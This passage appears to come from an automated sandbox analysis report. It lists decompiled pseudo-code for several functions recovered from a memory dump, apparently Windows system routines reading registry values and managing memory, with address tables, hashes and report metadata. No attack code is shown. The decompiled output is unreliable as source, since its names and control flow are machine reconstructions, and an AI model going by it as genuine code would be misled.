				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E010B9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0113A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0113A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x1168b04 >> 0x14) + (_v44 -  *0x1168b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E01097D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0113138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E01097D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0112FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x1168724 & 0x00000008) != 0) {
						E011352F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E011415B5(0x1168ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                                            0x01140eb7
                                                                            0x01140eb9
                                                                            0x01140ec0
                                                                            0x01140ec2
                                                                            0x01140ecd
                                                                            0x0114105b
                                                                            0x0114105b
                                                                            0x01141061
                                                                            0x01141066
                                                                            0x01141066
                                                                            0x0114106b
                                                                            0x01141073
                                                                            0x01141073
                                                                            0x01140ed3
                                                                            0x01140ed6
                                                                            0x01140edc
                                                                            0x01140ee0
                                                                            0x01140ee7
                                                                            0x01140ef0
                                                                            0x01140ef5
                                                                            0x01140efa
                                                                            0x01140efc
                                                                            0x01140efd
                                                                            0x01140f03
                                                                            0x01140f04
                                                                            0x01140f06
                                                                            0x01140f07
                                                                            0x01140f09
                                                                            0x01140f0e
                                                                            0x01140f14
                                                                            0x01140f23
                                                                            0x01140f2d
                                                                            0x01140f34
                                                                            0x01140f34
                                                                            0x01140f14
                                                                            0x01140f52
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01140f58
                                                                            0x01140f73
                                                                            0x01140f74
                                                                            0x01140f79
                                                                            0x01140f7d
                                                                            0x01140f80
                                                                            0x01140f86
                                                                            0x01140fab
                                                                            0x01140fb5
                                                                            0x01140fc6
                                                                            0x01140fd1
                                                                            0x01140fe3
                                                                            0x01140fd3
                                                                            0x01140fdc
                                                                            0x01140fdc
                                                                            0x01140feb
                                                                            0x01141009
                                                                            0x01141009
                                                                            0x01141015
                                                                            0x01141027
                                                                            0x01141017
                                                                            0x01141020
                                                                            0x01141020
                                                                            0x0114102f
                                                                            0x0114103c
                                                                            0x0114103c
                                                                            0x01141048
                                                                            0x01141050
                                                                            0x01141050
                                                                            0x01141055
                                                                            0x00000000
                                                                            0x01141055
                                                                            0x01140f88
                                                                            0x01140f9e
                                                                            0x01140fa2
                                                                            0x01140fa9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01140fa9
                                                                            0x00000000

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: `
                                                                            • API String ID: 0-2679148245
                                                                            • Opcode ID: 8308e9afa9baf1f77a2d0f0b0a03737cb44584b1657799edcf056ee8fcfae7d9
                                                                            • Instruction ID: b4f94a9fc8979b7175b01ab7cf3d57d5832301c663e2355c3e300d45ccc70325
                                                                            • Opcode Fuzzy Hash: 8308e9afa9baf1f77a2d0f0b0a03737cb44584b1657799edcf056ee8fcfae7d9
                                                                            • Instruction Fuzzy Hash: 3A518E713043429FD329DF29D884B5BBBE5EBC8A14F04092CFA9697290D771E845CB62
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 010AF0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 75%
                                                                            			E010AF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E01094120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E010B9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L010977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E010B9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E010B95D0();
							goto L11;
						} else {
							_t109 = L01094620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E010BF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E010B95D0();
										L010977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                                            0x010af0d3
                                                                            0x010af0d9
                                                                            0x010af0e0
                                                                            0x010af0e7
                                                                            0x010af0f2
                                                                            0x010af0f4
                                                                            0x010af0f8
                                                                            0x010af100
                                                                            0x010af108
                                                                            0x010af10d
                                                                            0x010af115
                                                                            0x010af116
                                                                            0x010af11f
                                                                            0x010af123
                                                                            0x010af124
                                                                            0x010af12c
                                                                            0x010af130
                                                                            0x010af134
                                                                            0x010af13d
                                                                            0x010af144
                                                                            0x010af14b
                                                                            0x010af152
                                                                            0x010ebab0
                                                                            0x010ebab0
                                                                            0x010af158
                                                                            0x010af158
                                                                            0x010af15a
                                                                            0x010af160
                                                                            0x010af165
                                                                            0x010af166
                                                                            0x010af16f
                                                                            0x010af173
                                                                            0x010ebaa7
                                                                            0x010ebaa7
                                                                            0x010ebaab
                                                                            0x00000000
                                                                            0x010af179
                                                                            0x010af18d
                                                                            0x010af191
                                                                            0x010ebaa2
                                                                            0x00000000
                                                                            0x010af197
                                                                            0x010af19b
                                                                            0x010af1a2
                                                                            0x010af1a9
                                                                            0x010af1af
                                                                            0x010af1b2
                                                                            0x010af1b6
                                                                            0x010af1b9
                                                                            0x010af1c4
                                                                            0x010af1d8
                                                                            0x010af1df
                                                                            0x010af1e3
                                                                            0x010af1eb
                                                                            0x010af1ee
                                                                            0x010af1f4
                                                                            0x010af20f
                                                                            0x010ebab7
                                                                            0x010ebabb
                                                                            0x010ebacc
                                                                            0x010ebad1
                                                                            0x010af215
                                                                            0x010af218
                                                                            0x010af226
                                                                            0x010af22b
                                                                            0x00000000
                                                                            0x010af22b
                                                                            0x010af1f6
                                                                            0x010af1f6
                                                                            0x010af1f9
                                                                            0x010af1fb
                                                                            0x010af1fb
                                                                            0x010af1f4
                                                                            0x010af191
                                                                            0x010af173
                                                                            0x010af152
                                                                            0x010af203

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @
                                                                            • API String ID: 0-2766056989
                                                                            • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                            • Instruction ID: 22f8575f0d85b9f68c3ee6d972eff377027d81a325ad45778eeb3dfd17de4e87
                                                                            • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                            • Instruction Fuzzy Hash: 79518D71504711AFC321DF69C840AABBBF8FF48714F00892EFA9597690E7B4E914CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 010F3540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 75%
                                                                            			E010F3540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x116d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E010B0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E010F3706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E010BFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E010F3540;
						E010BFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E010CDDD0( &_v1072, _t75, _t79, _t80, _t81);
						E01100C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E010B97C0();
					}
					return E010BB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E010F3971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E010F3884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E010BFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E010B9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E010F3787(_a4,  &_v352, _t80);
						}
					}
					L010977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E010B95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                                            0x010f3552
                                                                            0x010f355a
                                                                            0x010f355d
                                                                            0x010f3566
                                                                            0x010f3567
                                                                            0x010f357e
                                                                            0x010f358f
                                                                            0x010f35a1
                                                                            0x010f35a5
                                                                            0x010f366b
                                                                            0x010f366b
                                                                            0x010f366d
                                                                            0x010f3672
                                                                            0x010f3679
                                                                            0x010f3685
                                                                            0x010f368d
                                                                            0x010f369d
                                                                            0x010f36a7
                                                                            0x010f36b8
                                                                            0x010f36c6
                                                                            0x010f36c7
                                                                            0x010f36dc
                                                                            0x010f36e1
                                                                            0x010f36e7
                                                                            0x010f36e9
                                                                            0x010f36e9
                                                                            0x010f3703
                                                                            0x010f3703
                                                                            0x010f35b5
                                                                            0x010f35c0
                                                                            0x010f35c4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010f35ca
                                                                            0x010f35d7
                                                                            0x010f35e2
                                                                            0x010f35e6
                                                                            0x010f35e8
                                                                            0x010f35f5
                                                                            0x010f35fa
                                                                            0x010f3603
                                                                            0x010f3604
                                                                            0x010f3609
                                                                            0x010f360a
                                                                            0x010f3612
                                                                            0x010f3613
                                                                            0x010f361e
                                                                            0x010f3622
                                                                            0x010f3628
                                                                            0x010f362f
                                                                            0x010f362f
                                                                            0x010f3636
                                                                            0x010f3638
                                                                            0x010f363b
                                                                            0x010f3642
                                                                            0x010f3642
                                                                            0x010f3636
                                                                            0x010f3657
                                                                            0x010f3657
                                                                            0x010f365c
                                                                            0x010f3662
                                                                            0x010f3669
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: BinaryHash
                                                                            • API String ID: 0-2202222882
                                                                            • Opcode ID: 8380f9592dac5e1513d06b6e228cd789b994964809c3a2e5d67a4630ecf28d5b
                                                                            • Instruction ID: 327fc2ac966da62586be38932216f173ba5389f23a8383accb83d7a273245aa2
                                                                            • Opcode Fuzzy Hash: 8380f9592dac5e1513d06b6e228cd789b994964809c3a2e5d67a4630ecf28d5b
                                                                            • Instruction Fuzzy Hash: 3C4125F1D0052DABDB21DA54CC85FDEB77CAB54724F0085A9EB49AB240DB319E88CF94
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 011405AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 71%
                                                                            			E011405AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E011407DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E010B9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0113A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0113A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E01141293(_t79, _v40, E011407DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E01097D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0113138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                                            0x011405c5
                                                                            0x011405ca
                                                                            0x011405d3
                                                                            0x011406db
                                                                            0x011406db
                                                                            0x011406dd
                                                                            0x011406e3
                                                                            0x011406e3
                                                                            0x011405dd
                                                                            0x011405e7
                                                                            0x011405f6
                                                                            0x01140600
                                                                            0x01140607
                                                                            0x01140610
                                                                            0x01140615
                                                                            0x0114061a
                                                                            0x0114061c
                                                                            0x0114061e
                                                                            0x01140624
                                                                            0x01140625
                                                                            0x01140627
                                                                            0x01140628
                                                                            0x01140631
                                                                            0x01140640
                                                                            0x0114064d
                                                                            0x01140654
                                                                            0x01140654
                                                                            0x01140631
                                                                            0x0114066d
                                                                            0x01140674
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01140692
                                                                            0x0114069e
                                                                            0x011406b0
                                                                            0x011406a0
                                                                            0x011406a9
                                                                            0x011406a9
                                                                            0x011406b8
                                                                            0x011406d6
                                                                            0x011406d6
                                                                            0x00000000

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: `
                                                                            • API String ID: 0-2679148245
                                                                            • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                            • Instruction ID: ccb43a3e158ae07fe416d6fe8a8388b057edb74b69a5f12e91c45aab420f5fcf
                                                                            • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                            • Instruction Fuzzy Hash: A931D0322043066BE714DE2ACD84FD67B99AFC8B58F144229BB959B280D770E905CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 010F3884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 72%
                                                                            			E010F3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E010B9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L010977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L01094620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E010B9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                                            0x010f3893
                                                                            0x010f3896
                                                                            0x010f3899
                                                                            0x010f389f
                                                                            0x010f38a0
                                                                            0x010f38a4
                                                                            0x010f38a9
                                                                            0x010f38ac
                                                                            0x010f38ad
                                                                            0x010f38ae
                                                                            0x010f38af
                                                                            0x010f38b1
                                                                            0x010f38b4
                                                                            0x010f38bb
                                                                            0x010f38bc
                                                                            0x010f38bd
                                                                            0x010f38c4
                                                                            0x010f38c8
                                                                            0x010f38ca
                                                                            0x010f38ca
                                                                            0x010f38d5
                                                                            0x010f393e
                                                                            0x010f3940
                                                                            0x010f3942
                                                                            0x010f3952
                                                                            0x010f3954
                                                                            0x010f3961
                                                                            0x010f3961
                                                                            0x010f3967
                                                                            0x010f396e
                                                                            0x010f396e
                                                                            0x010f3947
                                                                            0x010f394c
                                                                            0x00000000
                                                                            0x010f394c
                                                                            0x010f38ea
                                                                            0x010f38ee
                                                                            0x010f38f8
                                                                            0x010f38f9
                                                                            0x010f38ff
                                                                            0x010f3900
                                                                            0x010f3902
                                                                            0x010f3903
                                                                            0x010f390b
                                                                            0x010f390f
                                                                            0x010f3950
                                                                            0x00000000
                                                                            0x010f3950
                                                                            0x010f3915
                                                                            0x010f391d
                                                                            0x010f391d
                                                                            0x010f3922
                                                                            0x010f3926
                                                                            0x00000000
                                                                            0x010f3928
                                                                            0x010f392b
                                                                            0x010f392b
                                                                            0x010f3935
                                                                            0x010f3937
                                                                            0x010f3937
                                                                            0x00000000
                                                                            0x010f3935
                                                                            0x010f3926
                                                                            0x010f38f0
                                                                            0x00000000

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: BinaryName
                                                                            • API String ID: 0-215506332
                                                                            • Opcode ID: f17198b38435df40738311323a6a42bc911c0c86a0cf28bb4cb2f0b7cf63ac45
                                                                            • Instruction ID: eb7eebf47203b544bd0a3afc32e8a686e9f0f88a03046f485347ac09e8058607
                                                                            • Opcode Fuzzy Hash: f17198b38435df40738311323a6a42bc911c0c86a0cf28bb4cb2f0b7cf63ac45
                                                                            • Instruction Fuzzy Hash: EB310872D0450AAFDB15DA58C946DAFB7B4FB40730F01416DEA94AB640D7319E00CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 010AD294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 33%
                                                                            			E010AD294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x116d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E01094120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E010BB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E010B98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E010B95D0();
					L010977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L010977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                                            0x010ad29c
                                                                            0x010ad2a6
                                                                            0x010ad2b1
                                                                            0x010ad2b5
                                                                            0x010ad2b6
                                                                            0x010ad2bc
                                                                            0x010ad2bd
                                                                            0x010ad2be
                                                                            0x010ad2bf
                                                                            0x010ad2c2
                                                                            0x010ad2c4
                                                                            0x010ad2cc
                                                                            0x010ad384
                                                                            0x010ad34b
                                                                            0x010ad34f
                                                                            0x010ad350
                                                                            0x010ad351
                                                                            0x010ad35c
                                                                            0x010ad35c
                                                                            0x010ad2d6
                                                                            0x010ad2da
                                                                            0x010ad2e1
                                                                            0x010ad361
                                                                            0x010ad369
                                                                            0x010ad36d
                                                                            0x010ad2e3
                                                                            0x010ad2e3
                                                                            0x010ad2e3
                                                                            0x010ad2e5
                                                                            0x010ad2ed
                                                                            0x010ad2f5
                                                                            0x010ad2fa
                                                                            0x010ad302
                                                                            0x010ad303
                                                                            0x010ad30b
                                                                            0x010ad30f
                                                                            0x010ad313
                                                                            0x010ad318
                                                                            0x010ad31c
                                                                            0x010ad320
                                                                            0x010ad379
                                                                            0x010ad37d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010eaffe
                                                                            0x010eb001
                                                                            0x010eb011
                                                                            0x00000000
                                                                            0x010ad322
                                                                            0x010ad322
                                                                            0x010ad330
                                                                            0x010ad337
                                                                            0x010ad35d
                                                                            0x010ad339
                                                                            0x010ad33f
                                                                            0x010ad38c
                                                                            0x010ad38c
                                                                            0x010ad33f
                                                                            0x010ad349
                                                                            0x00000000
                                                                            0x010ad349

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @
                                                                            • API String ID: 0-2766056989
                                                                            • Opcode ID: 0277cd6ffe2849e96730800768b41ba5b874604a33886ca4d3eb7db8b64f4f81
                                                                            • Instruction ID: ea7862e16d90dafa8f0e4a214992ab796ae17cc7a87055125e872eb6899cc3a8
                                                                            • Opcode Fuzzy Hash: 0277cd6ffe2849e96730800768b41ba5b874604a33886ca4d3eb7db8b64f4f81
                                                                            • Instruction Fuzzy Hash: 7D31DFB2608305AFC721DFA8C8809AFBBE8FB99654F40492EF9D483610D634DD04CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01081B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 72%
                                                                            			E01081B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E010BBB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E010BA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E010BA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
